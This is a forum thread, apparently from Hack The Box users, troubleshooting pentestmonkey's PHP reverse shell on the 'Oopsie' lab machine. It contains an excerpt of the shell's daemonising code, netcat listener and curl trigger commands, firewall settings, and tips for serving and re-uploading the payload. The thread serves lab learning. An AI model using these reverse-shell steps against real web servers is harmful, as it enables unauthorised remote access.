php-reverse-shell.php issue

@Phase said:

I had this same issue. It means your pc isn’t listening on the port.

You want to issue this command on your machine

nc -lnvp ‘whatever port you set in reverse shell’

e.g. nc -lnvp 1234

That’s not what it means. Assuming you’re using the most common script…

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}
	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

Additionally from the Pentestmonkey website…

“Isn’t the shell connection just going to be severed when the web server times out the PHP script?
No. It doesn’t seem to on the systems that I’ve tested it on (Gentoo Linux only so far). Additionally the PHP script attempts to daemonise itself and dissociate from the parent process to avoid this (though it rarely works in practise). Your browser will appear to hang when you access the reverse shell. This is normal. It’s OK to hit cancel in your browser once you’ve got your shell.”

But the shell doesn’t appear.

I have this exact problem; it’s with a retired machine. I even then followed along with the write-up. They were doing exactly what I was doing. Need to fix whatever my problem is, this is very important to me.

Figured out what I was doing: using Kali to serve the PHP page, I was wget’ing only an error message, so that was all I saw. Lol. It was a learning moment.

Late to the party, but I’m running into this exact same issue and unfortunately I don’t think anyone explained how they resolved the issue in the comments above. Would someone care to please help me out?

Was also running into this. Check your firewall settings and make sure your kali box is able to accept the port you are using in the php file.

if using ufw you can run this command:

ufw allow from 10.10.10.28 proto tcp to any port 1234

replace the ip and port based on your use case

@Blackxbeard said:
Was also running into this. Check your firewall settings and make sure your kali box is able to accept the port you are using in the php file.

if using ufw you can run this command:

ufw allow from 10.10.10.28 proto tcp to any port 1234

replace the ip and port based on your use case

Did this (changed “port 1234” to “port 80” since I think that’s the one I need), but alas, no luck.

For reference, here is the error message I get:

curl http://10.10.10.28/uploads/php-reverse-shell.php
WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

Have you tried generating a PHP reverse shell with msfvenom instead? That works too.
Not sure which this box is, but I got the same error when I used pentestmonkey’s reverse shell found in /usr/share/webshells/php/. This was for a Windows box.

WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

@ivanitlearning said:
Have you tried generating a PHP reverse shell with msfvenom instead? That works too.
Not sure which this box is, but I got the same error when I used pentestmonkey’s reverse shell found in /usr/share/webshells/php/. This was for a Windows box.

WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

No luck there either. Every exploit I tried, nothing happened and then when I exited it would say “exploit successful. No session created”

Hello Everyone,

I got the same problems. I tried to go through everything and I made it in the end :smiley: , so this will help you troubleshoot the issue and try everything:

  1. Before uploading php-reverse-shell.php to the target, first of all modify the IP address and put in the one that was assigned to you through your connection to the Hackthebox network; it starts with 10.10.14. and you can find it using either the “ifconfig” or “ip a” command. About the port number: you can change the port or leave it as it is, i.e. “1234”, but for best practice let’s change it to “33456” instead.

  2. Now you have modified the file, uploaded it to the web server, and got the message in the web browser that your file is uploaded. CONGRATS!! Here’s the critical part:

  3. First of all, run the nc command “nc -lvnp 33456”, and before running it check that the firewall is disabled using the command “ufw status”.

  4. Now you’re listening on port 33456 and waiting for the machine to reverse connect to you; you invoke the event by running the curl command (make sure that your filename is right).

  5. Normally in this case you should see, on the terminal where you executed the “nc” command, a little $ to run your commands, and that the connection is established.

There’s something I still do not understand, i.e.: if I stay inactive in the connection I established, the connection on the port closes (which is normal), but when I try to execute the curl command I get a 404, which specifies that the file is removed, so I need to go through the process again and upload the file and… I think that when the PHP script is terminated it deletes itself automatically, which is a good cybersecurity best practice to not leave a print in the attacked machine.

Best Regards,
Salah,

Check whether you are entering the correct IP address; it must be the tun0 interface. And try listening via nc -lvvp 1234

2 Likes

@SalahEo said:
There’s something I still do not understand, i.e.: if I stay inactive in the connection I established, the connection on the port closes (which is normal), but when I try to execute the curl command I get a 404, which specifies that the file is removed, so I need to go through the process again and upload the file and… I think that when the PHP script is terminated it deletes itself automatically, which is a good cybersecurity best practice to not leave a print in the attacked machine.

Tip for your next machines: when uploading files that keep getting deleted, if you’re using Burp Proxy you can send the upload request from Proxy > HTTP history to Repeater and resend it to upload the same file again without modifying any cookies or data.

1 Like

Sorry, I never explained the mistake I was making. It is embarrassing, but it may help someone. Keep in mind I was a total noob, I mean my noobness was extreme, not as bad now… But to the problem I was making for myself… How are you getting your shell to your box? Are you serving it? Like does that server speak php? If so you are only going to upload error messages-- not a shell. So turn apache2 off on your haxor box, and use

python3 -m http.server port
sudo python3 -m http.server low port

I hope this helps someone, it was my first real big problem and was very discouraging.
I apologize for stealing that moment when you figured out your problem if that is indeed what just happened.

Just in case anyone else is facing the same problem, point the reverse shell to your HTB IP address located at the tun0 interface and not your WIFI interface.

1 Like

Heya, I am facing the same issue.
- My tun0 interface IP is 10.10.14.23
- No firewall is up at machine or network level
- No port redirection for 8443
- My VPN is up and running (I can ping and access the Oopsie machine)
- I have successfully uploaded a reverseshell.php and set up the IP 10.10.14.23 and port 8443
- I am listening on port 8443
nc -lvnp 8443
listening on [any] 8443 …

- And when I execute the shell I got
[~/HTB/Oopsie]
└─$ curl http://10.10.10.28/uploads/reverseshelltest.php
WARNING: Failed to daemonise. This is quite common and not fatal.
Connection refused (111)

I am really trying to see what is causing this, no more hints so far :frowning:

PS: btw, for those who get a 404 error, the files are deleted every X minutes so you should upload it again

Hello,

You probably use a server that has a PHP module. When you call your script it executes on your server. That’s why it does not work. To fix this issue you have to delete the extension of the PHP file, then transfer it to the victim machine and add the .php extension after. Normally it should work.

Just a quick follow up: this was due to the duration of the VPN tunnel somehow. It had been running all night; I closed it, regenerated the access pack and got the same workflow running at the same time. Not sure exactly what (a time out? a token? …) but at least I was able to complete it!

@Vetka said:

Hello,

You probably use a server that has a PHP module. When you call your script it executes on your server. That’s why it does not work. To fix this issue you have to delete the extension of the PHP file, then transfer it to the victim machine and add the .php extension after. Normally it should work.

How would you do that? I have the same problem.

Did you check whether the local firewall is running? I stopped this and found webshell.